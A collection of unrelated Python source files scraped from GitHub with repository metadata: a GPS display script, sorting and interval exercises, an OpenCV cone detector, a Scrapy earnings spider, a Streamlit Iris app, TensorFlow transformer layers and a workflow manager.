backlight = digitalio.DigitalInOut(board.D22)
backlight.switch_to_output()
backlight.value = True
while True:
iterator = 0
# Get output from std
with Popen(["gpspipe", "/dev/ttyACM0", "-r"], stdout=PIPE, bufsize=1,
universal_newlines=True) as p:
for line in p.stdout:
iterator = iterator + 1
# counting up to 4 lines ignores the headers that would otherwise be unfit for parsing
if(iterator >= 4):
gpsmsg = pynmea2.parse(line)
# handling errors is critical - program will fail without this step
try:
latitude = gpsmsg.lat
longitude = gpsmsg.lon
#altitude = gpsmsg.alt
y = top
if(latitude != 0 and latitude != "null" and latitude != "NULL" and latitude != "" and latitude != " "):
#print(latitude)
draw.rectangle((0, 0, width, height), outline=0, fill=0)
#Write GPS data to screen
#y = top
draw.text((x, y), "LAT: " + latitude, font=font, fill=WHITE)
y += font.getsize("LAT")[1]
if(longitude != 0 and longitude != "null" and longitude != "NULL" and longitude != "" and longitude != " "):
draw.text((x, y), "LON: " + longitude, font=font, fill=WHITE)
y += font.getsize("LON")[1]
#if(altitude != 0 and altitude != "null" and altitude != "NULL" and altitude != "" and altitude != " "):
#draw.text((x, y), "ALT: " + altitude, font=font, fill=WHITE)
#y += font.getsize("ALT")[1]
except:
print("cannot parse that")
#pass
disp.image(image, rotation)
time.sleep(0.1)
|
vwls/toolbox
|
gps_data_to_screen.py
|
gps_data_to_screen.py
|
py
| 4,226 |
python
|
en
|
code
| 0 |
github-code
|
6
|
38290618145
|
# Given an array of intervals, find the next interval of each interval.
# In a list of intervals, for an interval ‘i’ its next interval ‘j’ will have
# the smallest ‘start’ greater than or equal to the ‘end’ of ‘i’.
# Write a function to return an array containing indices of the next interval of each input interval.
# If there is no next interval of a given interval, return -1.
# It is given that none of the intervals have the same start point.
from heapq import *
class Interval:
def __init__(self, start, end):
self.start = start
self.end = end
def find_next_interval(intervals):
result = []
minStartHeap = []
for i in range(len(intervals)):
heappush(minStartHeap, (intervals[i].start, i))
for i in range(len(intervals)):
if minStartHeap:
while minStartHeap:
start, index = heappop(minStartHeap)
if intervals[i].end <= start and i < index:
result.append(index)
else:
result.append(-1)
return result
def main():
result = find_next_interval(
[Interval(2, 3), Interval(3, 4), Interval(5, 6)])
print("Next interval indices are: " + str(result))
result = find_next_interval(
[Interval(3, 4), Interval(1, 5), Interval(4, 6)])
print("Next interval indices are: " + str(result))
main()
|
nanup/DSA
|
9. Two Heaps/436. Find Right Interval.py
|
436. Find Right Interval.py
|
py
| 1,263 |
python
|
en
|
code
| 0 |
github-code
|
6
|
4657631542
|
import random
import copy
# Чисто параметры для проверки алгоритма
seed_value = 60 # зерно рандомайзера
kolvo_prov = 10 # количество проверок
arr_legth = 20 # длинна проверяемых списков
random.seed(seed_value) # установка зерна
# Сам алгоритм быстрой сортировки.
def quick_sort(array):
if len(array) < 2:
return array
else:
index = random.randrange(0, len(array))
middle = array[index]
del array[index]
lower_arr = [i for i in array if i <= middle]
upper_arr = [j for j in array if j > middle]
return quick_sort(lower_arr) + [middle] + quick_sort(upper_arr)
# Цикл проверки алгоритма. Он создает два одинаковых списка с рандомными значениями и затем сортируется встроенным
# методом sort и алгоритмом быстрой сортировки. Если все норм, то он выведет истину, если где то ошибка то выведет не
# истину.
for _ in range(kolvo_prov):
prov = True
arr1 = [random.randrange(-100, 100) for _ in range(arr_legth)]
arr2 = copy.deepcopy(arr1)
print(f'\nМассив 1: {arr1}\nМассив 2: {arr2}')
arr1.sort()
arr2 = quick_sort(arr2)
print(f"Разные ли объекты (списки):{arr1 is not arr2}")
print(
f'Массив отсортированный встроенной функцией (1 массив):\n{arr1}\n'
f'Массив отсортированный быстрой сортировкой (2 массив):\n{arr2}')
seed_value += 1
for arr_index in range(arr_legth):
if not arr1[arr_index] == arr2[arr_index]:
prov = False
break
print(f"Одинаково ли отсортированы списки: {prov}")
|
WeideR66/littlepythonprojects
|
quick_sort_alg.py
|
quick_sort_alg.py
|
py
| 2,022 |
python
|
ru
|
code
| 0 |
github-code
|
6
|
33415585016
|
import cv2 as cv
import numpy as np
from matplotlib import pyplot as plt
import scipy.optimize as optimize
# Opening image
img = cv.imread("red.png")
# Uncomment this and run the program to make sure the
# convex_hull_pointing_up algorithm works
# img = cv.rotate(img, cv.ROTATE_180)
# OpenCV stores images as BGR by default
# so the following two lines flip the color channels
# to RGB and HSV
img_rgb = cv.cvtColor(img, cv.COLOR_BGR2RGB)
img_hsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)
# Create the environment of the picture
plt.subplot(1, 1, 1)
plt.imshow(img_rgb)
# Defining thresholds to isolate the HSV pixels that
# have the desired color
img_thresh_low = cv.inRange(img_hsv, np.array([0, 135, 135]), np.array([15, 255, 255]))
img_thresh_high = cv.inRange(img_hsv, np.array([159, 135, 135]), np.array([179, 255, 255]))
# Add the two threshold maps together
img_thresh = cv.bitwise_or(img_thresh_low, img_thresh_high)
# Use erosion followed by dilation to remove noise
kernel = np.ones((5, 5))
img_thresh_opened = cv.morphologyEx(img_thresh, cv.MORPH_OPEN, kernel)
# Blur the image slightly
img_thresh_blurred = cv.medianBlur(img_thresh_opened, 5)
# Find edges with the Canny edge detection algorithm
img_edges = cv.Canny(img_thresh_blurred, 70, 255)
# Get contours
contours, _ = cv.findContours(np.array(img_edges), cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)
# Approximate contours using the Douglas-Peucker algorithm
approx_contours = []
for c in contours:
approx = cv.approxPolyDP(c, 5, closed=True)
approx_contours.append(approx)
# Find convex hulls of the contours
all_convex_hulls = []
for ac in approx_contours:
all_convex_hulls.append(cv.convexHull(ac))
# Remove any hulls with more than 10 or less than 3 points
convex_hulls_3to10 = []
for ch in all_convex_hulls:
if 3 <= len(ch) <= 10:
convex_hulls_3to10.append(cv.convexHull(ch))
# Define a function to check if a hull is pointing up
def convex_hull_pointing_up(ch: np.ndarray) -> bool:
points_above_center, points_below_center = [], []
_, y, _, h = cv.boundingRect(ch)
vertical_center = y + h / 2
for point in ch:
if point[0][1] < vertical_center:
points_above_center.append(point)
elif point[0][1] >= vertical_center:
points_below_center.append(point)
x_above, _, w_above, _ = cv.boundingRect(np.array(points_above_center))
x_below, _, w_below, _ = cv.boundingRect(np.array(points_below_center))
return x_above <= x_below + w_below and x_above + w_above <= x_below + w_below \
and x_above >= x_below and x_above + w_above >= x_below
cones = []
bounding_rects = []
# Filter out the contours that aren't pointing up
for ch in convex_hulls_3to10:
if convex_hull_pointing_up(ch):
cones.append(ch)
rect = cv.boundingRect(ch)
bounding_rects.append(rect)
img_res = img_rgb.copy()
# Draw rectangles around the identified cones
for rect in bounding_rects:
x, y, w, h = rect
cv.rectangle(img_res, (x, y), (x + w, y + h), (0, 255, 0), 2)
# Fit best-fit lines to the left and right sides of the screen
cone_points_left = [(rect[0] + rect[2] / 2, rect[1] + rect[3] / 2) for rect in bounding_rects if rect[0] + rect[2] / 2 < img_res.shape[1] / 2]
cone_points_right = [(rect[0] + rect[2] / 2, rect[1] + rect[3] / 2) for rect in bounding_rects if rect[0] + rect[2] / 2 > img_res.shape[1] / 2]
def least_squares(x, y):
# Create the least squares objective function.
def func(x, a, b):
return a * x + b
popt, pcov = optimize.curve_fit(func, x, y)
return popt
# Get best fit lines for these points
a1, b1 = least_squares(np.array([i[0] for i in cone_points_left]), np.array([i[1] for i in cone_points_left]))
a2, b2 = least_squares(np.array([i[0] for i in cone_points_right]), np.array([i[1] for i in cone_points_right]))
# Draw the best-fit lines on the image
cv.line(img_res, [0, int(b1)], [3000, int((3000 * a1) + b1)], (255, 1, 1), 5)
cv.line(img_res, [0, int(b2)], [3000, int((3000 * a2) + b2)], (255, 1, 1), 5)
# Display and save the final output image
plt.imshow(img_res)
plt.savefig("answer.png")
plt.show()
|
IamParvSinghal/Wisconsin_Autonomous
|
CV.py
|
CV.py
|
py
| 4,280 |
python
|
en
|
code
| 0 |
github-code
|
6
|
12267302602
|
# -*- coding: utf-8 -*-
import scrapy
from collections import OrderedDict
class BriefingEarningsSpider(scrapy.Spider):
name = 'briefing_earnings'
allowed_domains = ['www.briefing.com']
start_urls = ['https://www.briefing.com/Inv/content/Auth/Calendar/Earnings/week1.htm'] # Current week (week1)
def parse(self, response):
dates_lst = response.xpath('//*[@class="calDATE"]/text()').getall() # Get list of days (dates)
dates = {dates_lst[day]: day for day in range(len(dates_lst))}
dates_sort = OrderedDict(sorted(dates.items(), key=lambda x: x[1])) # Ordered dict to save que
for i, day in enumerate(dates_sort):
block = response.xpath('//*[@class="calDATE"]/following-sibling::ul')[i] # Block for day
events_lst = block.xpath('.//div[contains(@class,"calEVENT")]') # Block for ticket
tickets = OrderedDict()
for event in events_lst:
ticket = event.xpath('.//span/@data-ticker-search').get()
name = event.xpath('.//strong/text()').get()
surprise_value = event.xpath(
'.//span[contains(text(), "Surprise:")]/following-sibling::span/text()').get()
act_value = event.xpath('.//span[contains(text(), "Act:")]/following-sibling::span/text()').get()
cons_value = event.xpath('.//span[contains(text(), "Cons:")]/following-sibling::span/text()').get()
tickets.update({ticket: {'name': name,
'surprise_value': surprise_value,
'actual_value': act_value,
'consensus_value': cons_value}})
dates_sort.update({day: tickets}) # Add all tickets with values for day
yield dates_sort
|
kompotkot/WebScraper-Stocksinplay
|
stocksinplay/spiders/briefing_earnings.py
|
briefing_earnings.py
|
py
| 1,854 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43918724986
|
import streamlit as st
import pandas as pd
import plotly.express as px
import seaborn as sns
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
st.set_option('deprecation.showPyplotGlobalUse', False)
# Loading dataset
df = pd.read_csv('https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data',
names=['sepal_length', 'sepal_width', 'petal_length', 'petal_width', 'class'])
st.title('Exploratory Data Analysis of the Iris Dataset')
st.header('This app allows you to explore the Iris dataset and visualize the data using various plots.')
st.subheader("DataFrame")
st.dataframe(df)
selected_column = st.sidebar.selectbox('Select a column to visualize', df.columns)
st.write("Histogram Plots")
sns.histplot(df[selected_column])
st.pyplot()
st.write("Scatter plot")
x_axis = st.sidebar.selectbox('Select the x-axis', df.columns)
y_axis = st.sidebar.selectbox('Select the y-axis', df.columns)
fig = px.scatter(df, x=x_axis, y=y_axis)
st.plotly_chart(fig)
st.write("Pair Plot")
sns.pairplot(df, hue='class')
st.pyplot()
st.write("Description of the data")
st.table(df.describe())
st.header('Correlation Matrix')
corr = df.corr()
sns.heatmap(corr, annot=True)
st.pyplot()
st.header('Boxplot')
fig = px.box(df, y=selected_column)
st.plotly_chart(fig)
selected_class = st.sidebar.selectbox('Select a class to visualize', df['class'].unique())
if st.sidebar.button('Show Violin Plot'):
fig = px.violin(df[df['class'] == selected_class], y=selected_column)
st.plotly_chart(fig)
|
avrabyt/Holiday-coding-session
|
streamlit_app.py
|
streamlit_app.py
|
py
| 1,556 |
python
|
en
|
code
| 3 |
github-code
|
6
|
27937806135
|
#!/usr/bin/python
# coding: utf-8
import numpy as np
import cv2
import csv
import os
import shutil
import shutil
import logging
def to_image_string(image_filepath):
return open(image_filepath, "rb").read().encode("base64")
def from_base64(base64_data):
nparr = np.fromstring(base64_data.decode("base64"), np.uint8)
return cv2.imdecode(nparr, cv2.IMREAD_ANYCOLOR)
# clean all non-alphanumberic characters
def strip(string):
words = string.split()
words = [word for word in words if "#" not in word]
string = " ".join(words)
clean = ""
for c in string:
if str.isalnum(c) or (c in [" ", ".", ","]):
clean += c
return clean
# creating CSV header
def create_csv(filename):
with open(filename, "w+", newline="", encoding="utf-8") as save_file:
writer = csv.writer(save_file)
writer.writerow(["Author", "uTime", "Text"])
def write_to_csv(filename, data):
with open(filename, "a+", newline="", encoding="utf-8") as save_file:
writer = csv.writer(save_file)
writer.writerow(data)
def empty_folder(folder):
for filename in os.listdir(folder):
file_path = os.path.join(folder, filename)
try:
if os.path.isfile(file_path) or os.path.islink(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
empty_folder(file_path)
except Exception as e:
logging.info("Failed to delete %s. Reason: %s" % (file_path, e))
def move_file(source, dest):
shutil.move(source, dest)
|
Zyniel/DansePlanningManager
|
src/app/utils.py
|
utils.py
|
py
| 1,569 |
python
|
en
|
code
| 0 |
github-code
|
6
|
72000458749
|
"""Tensorflow transformer layers definition in trident"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import math
import tensorflow as tf
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from trident import context
from trident.backend import dtype as Dtype
from trident.backend.tensorflow_backend import Layer, Sequential, get_device, ModuleList
from trident.backend.tensorflow_ops import *
from trident.layers.tensorflow_activations import Gelu
from trident.layers.tensorflow_blocks import FullConnect_Block
from trident.layers.tensorflow_layers import Embedding, Dropout, Dense
from trident.layers.tensorflow_normalizations import LayerNorm
ctx = context._context()
_float_dtype = Dtype.float32# if ctx.amp_available == True and ctx.is_autocast_enabled == True and get_device() == 'cuda' else Dtype.float32
__all__ = ['Mlp','BERT','BERTEmbedding','PositionalEmbedding','PositionwiseFeedForward','DropPath','Attention','MultiHeadedAttention','SublayerConnection','TransformerBlock']
def Mlp(hidden_features=None, out_features=None,dropout_rate=0):
return Sequential(
FullConnect_Block(num_filters=hidden_features,activation=Gelu(),dropout_rate=dropout_rate,normalization=None),
FullConnect_Block(num_filters=out_features, activation=None, dropout_rate=dropout_rate,normalization=None),
)
class PositionalEmbedding(Layer):
def __init__(self, d_model, max_len=512):
super().__init__()
# Compute the positional encodings once in log space.
pe = np.zeros((max_len, d_model))
position = np.expand_dims(np.arange(0, max_len),1)
div_term = (np.arange(0,d_model,2) * -np.exp(np.log(10000.0) / d_model))
pe[:, 0::2] = np.sin(position * div_term)
pe[:, 1::2] = np.cos(position * div_term)
pe =to_tensor(np.expand_dims( pe,0))
self.register_buffer('pe', pe)
def forward(self, x, **kwargs):
return self.pe[:, :int_shape(x)[1]]
class PositionwiseFeedForward(Layer):
"Implements FFN equation."
def __init__(self, d_model, d_ff, dropout_rate=0.1):
super(PositionwiseFeedForward, self).__init__()
self.w_1 = Dense(num_filters= d_ff,activation=Gelu())
self.w_2 = Dense(num_filters= d_model)
self.dropout = Dropout(dropout_rate)
def forward(self, x):
return self.w_2(self.dropout(self.w_1(x)))
#
# class PositionEmbeddingSine(Layer):
# """
# This is a more standard version of the position embedding, very similar to the one
# used by the Attention is all you need paper, generalized to work on images.
# """
# def __init__(self, num_pos_feats=64, temperature=10000, normalize=False, scale=None):
# super().__init__()
# self.num_pos_feats = num_pos_feats
# self.temperature = temperature
# self.normalize = normalize
# if scale is not None and normalize is False:
# raise ValueError("normalize should be True if scale is passed")
# if scale is None:
# scale = 2 * math.pi
# self.scale = scale
#
# def forward(self, tensor_list):
# x = tensor_list.tensors
# mask = tensor_list.mask
# assert mask is not None
# not_mask = ~mask
# y_embed = not_mask.cumsum(1, dtype=torch.float32)
# x_embed = not_mask.cumsum(2, dtype=torch.float32)
# if self.normalize:
# eps = 1e-6
# y_embed = y_embed / (y_embed[:, -1:, :] + eps) * self.scale
# x_embed = x_embed / (x_embed[:, :, -1:] + eps) * self.scale
#
# dim_t = torch.arange(self.num_pos_feats, dtype=torch.float32, device=x.device)
# dim_t = self.temperature ** (2 * (dim_t // 2) / self.num_pos_feats)
#
# pos_x = x_embed[:, :, :, None] / dim_t
# pos_y = y_embed[:, :, :, None] / dim_t
# pos_x = torch.stack((pos_x[:, :, :, 0::2].sin(), pos_x[:, :, :, 1::2].cos()), dim=4).flatten(3)
# pos_y = torch.stack((pos_y[:, :, :, 0::2].sin(), pos_y[:, :, :, 1::2].cos()), dim=4).flatten(3)
# pos = torch.cat((pos_y, pos_x), dim=3).permute(0, 3, 1, 2)
# return pos
#
#
# class PositionEmbeddingLearned(Layer):
# """
# Absolute pos embedding, learned.
# """
# def __init__(self, num_pos_feats=256):
# super().__init__()
# self.row_embed = nn.Embedding(50, num_pos_feats)
# self.col_embed = nn.Embedding(50, num_pos_feats)
# self.reset_parameters()
#
# def reset_parameters(self):
# nn.init.uniform_(self.row_embed.weight)
# nn.init.uniform_(self.col_embed.weight)
#
# def forward(self, tensor_list):
# x = tensor_list.tensors
# h, w = x.shape[-2:]
# i = torch.arange(w, device=x.device)
# j = torch.arange(h, device=x.device)
# x_emb = self.col_embed(i)
# y_emb = self.row_embed(j)
# pos = torch.cat([
# x_emb.unsqueeze(0).repeat(h, 1, 1),
# y_emb.unsqueeze(1).repeat(1, w, 1),
# ], dim=-1).permute(2, 0, 1).unsqueeze(0).repeat(x.shape[0], 1, 1, 1)
# return pos
#
class BERTEmbedding(Layer):
"""
BERT Embedding which is consisted with under features
1. TokenEmbedding : normal embedding matrix
2. PositionalEmbedding : adding positional information using sin, cos
2. SegmentEmbedding : adding sentence segment info, (sent_A:1, sent_B:2)
sum of all these features are output of BERTEmbedding
"""
def __init__(self, vocab_size, embedding_dim,cls_idx=1,sep_idx=2,unk_idx=3,pad_idx=0,mask_idx=4, dropout_rate=0.1, add_noise=False,noise_intensity=0.05):
"""
:param vocab_size: total vocab size
:param embed_size: embedding size of token embedding
:param dropout: dropout rate
"""
super().__init__()
self.token = Embedding(num_embeddings=vocab_size,embedding_dim=embedding_dim,padding_idx=pad_idx,add_noise=add_noise,noise_intensity=noise_intensity)
self.position = PositionalEmbedding(d_model=self.token.embedding_dim)
self.segment = Embedding(num_embeddings=3,embedding_dim=self.token.embedding_dim,padding_idx=0)
self.cls_idx=cls_idx
self.sep_idx=sep_idx
self.pad_idx=pad_idx
self.unk_idx=unk_idx
self.mask_idx=mask_idx
self.dropout_rate=dropout_rate
self.dropout = Dropout(dropout_rate)
self.norm=LayerNorm()
self.embedding_dim = embedding_dim
def forward(self, x,segments_tensor=None):
if segments_tensor is None:
segments_tensor = zeros_like(x).to(x.device)
x = self.token(x) + self.position(x) + self.segment(segments_tensor)
x=self.norm(x)
if self.dropout_rate>0 and self.training:
x=self.dropout(x)
return x
class DropPath(Layer):
"""Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).
"""
def __init__(self, drop_prob=0):
super(DropPath, self).__init__()
self.drop_prob = drop_prob
def forward(self, x):
#return drop_path(x, self.drop_prob, self.training)
if self.drop_prob == 0. or not self.get_root().training:
return x
keep_prob = 1 - self.drop_prob
shape = (x.shape[0],) + (1,) * (x.ndim - 1) # work with diff dim tensors, not just 2D ConvNets
random_tensor =math_ops.floor( keep_prob +tf.random.uniform(shape, minval=0, maxval=1,dtype=x.dtype))
output = tf.math.divide_no_nan(x,keep_prob) * random_tensor
return output
class Attention(Layer):
"""
Compute 'Scaled Dot Product Attention
"""
def __init__(self, dropout_rate=0.1):
super().__init__()
self.dropout = Dropout(dropout_rate)
def forward(self, query, key, value, mask=None):
scores = math_ops.matmul(query, tf.transpose(key,perm = [0, 1, 3, 2])) / math.sqrt(int_shape(query)[-1])
#scores = math_ops.matmul(tf.transpose(query,perm = [0, 2, 1, 3]), tf.transpose(key,perm = [0, 2, 1, 3])) / math.sqrt(int_shape(query)[-1])
if mask is not None:
if scores.dtype == tf.float32:
scores=where(mask == 1,-1e9,scores)
else:
scores = where(mask == 1, -1e+4, scores)
p_attn = softmax(scores,axis=-1)
if self.dropout is not None:
p_attn = self.dropout(p_attn)
return math_ops.matmul(p_attn, value), p_attn
class MultiHeadedAttention(Layer):
"""
Take in model size and number of heads.
"""
def __init__(self, h, d_model, dropout_rate=0.1):
super().__init__()
assert d_model % h == 0
# We assume d_v always equals d_k
self.d_k = d_model // h
self.h = h
self.linear_layers = ModuleList([Dense(d_model) for _ in range(3)])
self.output_linear = Dense(d_model)
self.attention = Attention(dropout_rate=dropout_rate)
def forward(self, x, mask=None):
batch_size =int_shape(x)[0]
# 1) Do all the linear projections in batch from d_model => h x d_k
query=tf.transpose(tf.reshape(self.linear_layers[0](x),(batch_size, -1, self.h, self.d_k)),perm=[0,2,1,3])
key = tf.transpose(tf.reshape(self.linear_layers[1](x),(batch_size, -1, self.h, self.d_k)),perm=[0,2,1,3])
value = tf.transpose(tf.reshape(self.linear_layers[2](x),(batch_size, -1, self.h, self.d_k)),perm=[0,2,1,3])
# 2) Apply attention on all the projected vectors in batch.
x, attn = self.attention(query, key, value, mask=mask)
# 3) "Concat" using a view and apply a final linear.
x=tf.reshape(tf.transpose(x,perm=[0,2,1,3]),(batch_size, -1, self.h * self.d_k))
return self.output_linear(x)
class SublayerConnection(Layer):
"""
A residual connection followed by a layer norm.
Note for code simplicity the norm is first as opposed to last.
"""
def __init__(self, dropout_rate=0.0):
super(SublayerConnection, self).__init__()
self.norm = LayerNorm()
self.dropout = DropPath(dropout_rate)
def forward(self, x,sublayer):
"Apply residual connection to any sublayer with the same size."
return x + self.dropout(sublayer(self.norm(x)))
class TransformerBlock(Layer):
"""
Bidirectional Encoder = Transformer (self-attention)
Transformer = MultiHead_Attention + Feed_Forward with sublayer connection
"""
def __init__(self, hidden, attn_heads, feed_forward_hidden=None, dropout_rate=0.1):
"""
param hidden: hidden size of transformer
:param attn_heads: head sizes of multi-head attention
:param feed_forward_hidden: feed_forward_hidden, usually 4*hidden_size
:param dropout: dropout rate
"""
super().__init__()
if feed_forward_hidden is None:
feed_forward_hidden=4*hidden
self.attention = MultiHeadedAttention(h=attn_heads, d_model=hidden)
self.feed_forward = PositionwiseFeedForward(d_model=hidden, d_ff=feed_forward_hidden, dropout_rate=dropout_rate)
self.input_sublayer = SublayerConnection( dropout_rate=dropout_rate)
self.output_sublayer = SublayerConnection(dropout_rate=dropout_rate)
self.dropout = Dropout(dropout_rate=dropout_rate)
def forward(self, x, mask=None):
x = self.input_sublayer(x, lambda _x: self.attention.forward(_x, mask=mask))
x = self.output_sublayer(x, self.feed_forward)
return self.dropout(x)
class BERT(Layer):
"""
BERT model : Bidirectional Encoder Representations from Transformers.
"""
def __init__(self, vocab_size, hidden=768, n_layers=12, attn_heads=12, dropout_rate=0.1,pad_idx=0):
"""
param vocab_size: vocab_size of total words
:param hidden: BERT model hidden size
:param n_layers: numbers of Transformer blocks(layers)
:param attn_heads: number of attention heads
:param dropout: dropout rate
"""
super().__init__()
self.hidden = hidden
self.n_layers = n_layers
self.attn_heads = attn_heads
self.pad_idx=pad_idx
self.dropout_rate=dropout_rate
# paper noted they used 4*hidden_size for ff_network_hidden_size
self.feed_forward_hidden = hidden * 4
# embedding for BERT, sum of positional, segment, token embeddings
self.embedding = BERTEmbedding(vocab_size=vocab_size, embedding_dim=hidden,pad_idx=self.pad_idx)
for i in range(n_layers):
self.add_module('transformer_block{0}'.format(i),TransformerBlock(hidden, attn_heads, hidden * 4, dropout_rate) )
def forward(self, x,segments_tensor=None):
if int_shape(x)[1]==2:
x,segments_tensor=split(x,num_splits=2,axis=1)
x=x.squeeze(1)
segments_tensor=segments_tensor.squeeze(1)
elif segments_tensor is None:
segments_tensor = zeros_like(x, dtype=x.dtype).to(get_device())
# attention masking for padded token
# torch.ByteTensor([batch_size, 1, seq_len, seq_len)
mask =tf.expand_dims(tf.tile(tf.expand_dims(x == self.pad_idx,1),(1, int_shape(x)[1], 1)),1).to(x.dtype)
# embedding the indexed sequence to sequence of vectors
x = self.embedding(x, segments_tensor)
# running over multiple transformer blocks
for name,transformer in self.named_children():
if 'transformer_block' in name:
x = transformer.forward(x, mask)
return x
|
AllanYiin/trident
|
trident/layers/tensorflow_transformers.py
|
tensorflow_transformers.py
|
py
| 13,672 |
python
|
en
|
code
| 74 |
github-code
|
6
|
27956151936
|
# -*- coding: utf-8 -*-
import os
import pickle
#%%
def read_data_from_1810_09466():
# elements in datalist:
# element[0] = R (kpc)
# element[1] = vc (km/s)
# element[2] = sigma- (km/s)
# element[3] = sigma+ (km/s)
# element[4] = syst (km/s) # saved later
dir_path = os.path.dirname(os.path.realpath(__file__))
data_file=dir_path+'/1810_09466.dat'
with open(data_file, 'r') as f:
content = f.readlines()
data_lists = []
for line in content:
if not line.startswith('#') and line.strip():
data_lists.append([float(a) for a in line.split()])
systematics_file = dir_path+'/1810_09466-sys-data.dat'
with open(systematics_file, 'r') as f:
content = f.readlines()
syst_list = []
for line in content:
if not line.startswith('#') and line.strip():
syst_list.append([float(a) for a in line.split()])
relative_syst_list = [data[1] for data in syst_list]
data_values_list = [data[1] for data in data_lists]
syst_list = []
for i in range(len(relative_syst_list)):
syst_list.append(relative_syst_list[i]*data_values_list[i])
counter = 0
for element in data_lists:
element.append(syst_list[counter])
counter += 1
return data_lists
def pickle_results(Analysis, file_name):
data_to_pickle = {
'lnlikelihoods':Analysis.sampler.lnprobability,
'chains':Analysis.sampler.chain,
'acceptance_fractions':Analysis.sampler.acceptance_fraction,
'variable_names':Analysis.variables_key_list,
}
with open(file_name, "wb") as f:
pickle.dump(data_to_pickle,file=f)
def load_pickle_results(file_name):
with open(file_name, "rb") as f:
return pickle.load(f)
#%%
if __name__ == '__main__':
pass
|
pabferde/galaxy_dynamics_from_Vc
|
src/GalaxyDynamicsFromVc/datahandling.py
|
datahandling.py
|
py
| 1,894 |
python
|
en
|
code
| 0 |
github-code
|
6
|
11234447623
|
class exc(Exception):
types = {}
types["NV"] = "Not Enough or too many Values. Required at least 2."
types["NB"] = "Non base 2 numbers. . ."
class calculate(exc):
def __init__(self, instance_numbers=[0, 1], output_answer=True):
for items in [(len(instance_numbers) != 2, "NV"), (len([bob for bob in instance_numbers if bob not in [1, 0]]) != 0, "NB")]:
if items[0] != False:
raise exc(exc.types[items[1]])
self.orinst = instance_numbers[0] or instance_numbers[1]
print("[DATA] Number value: %d. . .[DISJUNCTION]"%(self.orinst))
self.andinst = instance_numbers[0] and instance_numbers[1]
print("[DATA] Number value: %d . . .[CONJUCTION]"%(self.andinst))
@property
def calculateIt(self):
cases = {1:0, 0:1}[self.andinst]
print("[DATA] Negative: %d. . ."%(cases) + "\r\x0A" + "\x2D"*25)
final_answer = self.orinst and cases
print("\r\x0A\r\x0A[DATA] Final answer: %d"%(final_answer))
|
noobprogammier/Semiconductor
|
semiconductor.py
|
semiconductor.py
|
py
| 933 |
python
|
en
|
code
| 1 |
github-code
|
6
|
6460491132
|
import random
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
nums = []
for i in range(1, 10):
num = random.randint(1, 100)
nums.append(num)
print(f'{bcolors.OKGREEN}{nums}, size: {len(nums)}{bcolors.ENDC}')
def shellsort(nums):
gap = len(nums)//2
while gap > 0:
for i in range(gap, len(nums)):
temp = nums[i]
j = i
while j >= gap and nums[j - gap] > temp:
nums[j] = nums[j - gap]
j = j - gap
nums[j] = temp
gap = gap // 2
return nums
print(shellsort(nums))
|
JohelPires/codewars
|
shellsort.py
|
shellsort.py
|
py
| 765 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30610778506
|
"""
Meta manager. Defines complex workflow in terms of lower level managers
For usage example see tests
"""
import re
from time import time
import logging
from collections import defaultdict, OrderedDict as odict
from copy import copy, deepcopy
import yaml
from shub_workflow.base import WorkFlowManager
from .utils import get_scheduled_jobs_specs
logger = logging.getLogger(__name__)
_STARTING_JOB_RE = re.compile("--starting-job(?:=(.+))?")
class GraphManager(WorkFlowManager):
jobs_graph = {}
base_failed_outcomes = ('failed', 'killed by oom', 'cancelled', 'cancel_timeout', 'memusage_exceeded',
'cancelled (stalled)')
def __init__(self):
self.__failed_outcomes = list(self.base_failed_outcomes)
# Ensure jobs are traversed in the same order as they went pending.
self.__pending_jobs = odict()
self.__running_jobs = odict()
self._available_resources = {} # map resource : ammount
self._acquired_resources = defaultdict(list) # map resource : list of (job, ammount)
self.__tasks = {}
super(GraphManager, self).__init__()
self.__start_time = defaultdict(time)
for task in self.configure_workflow() or ():
self._add_task(task)
@property
def description(self):
return f"Workflow manager for {self.name!r}"
def _add_task(self, task):
assert task.task_id not in self.jobs_graph,\
"Workflow inconsistency detected: task %s referenced twice." % task.task_id
self.jobs_graph[task.task_id] = task.as_jobgraph_dict()
self.__tasks[task.task_id] = task
for ntask in task.get_next_tasks():
self._add_task(ntask)
def configure_workflow(self):
raise NotImplementedError("configure_workflow() method need to be implemented.")
def on_start(self):
if not self.jobs_graph:
self.argparser.error('Jobs graph configuration is empty.')
if not self.args.starting_job and not self.args.resume_from_jobid:
self.argparser.error('You must provide either --starting-job or --resume-from-jobid.')
self._fill_available_resources()
ran_tasks = self._maybe_setup_resume()
self._setup_starting_jobs(ran_tasks)
self.workflow_loop_enabled = True
logger.info("Starting '%s' workflow", self.name)
def _get_starting_jobs_from_resumed_job(self):
starting_jobs = []
job = self.get_project().jobs.get(self.args.resume_from_jobid)
next_option_is_task = False
for option in job.metadata.get('job_cmd'):
if next_option_is_task:
starting_jobs.append(option)
else:
m = _STARTING_JOB_RE.match(option)
if m:
task = m.groups()[0]
if m:
starting_jobs.append(task)
else:
next_option_is_task = True
return starting_jobs
def _maybe_setup_resume(self):
ran_tasks = []
if self.args.resume_from_jobid:
# fill tasks job ids
logger.info("Will Resume from job (%s)", self.args.resume_from_jobid)
for _, name, jobid in get_scheduled_jobs_specs(self, [self.args.resume_from_jobid]):
mname, taskid = name.split('/')
assert mname == self.name, "Resuming from wrong manager job: %s" % self.args.resume_from_jobid
self.__tasks[taskid].append_jobid(jobid)
ran_tasks.append(taskid)
return ran_tasks
def _setup_starting_jobs(self, ran_tasks, candidates=None):
candidates = candidates or self.args.starting_job
if not candidates: # resuming
candidates = self._get_starting_jobs_from_resumed_job()
for taskid in candidates:
if taskid in ran_tasks:
logger.info("Task %s already done %s.", taskid, tuple(self.__tasks[taskid].get_scheduled_jobs()))
next_tasks = [t.task_id for t in self.__tasks[taskid].get_next_tasks()]
if next_tasks:
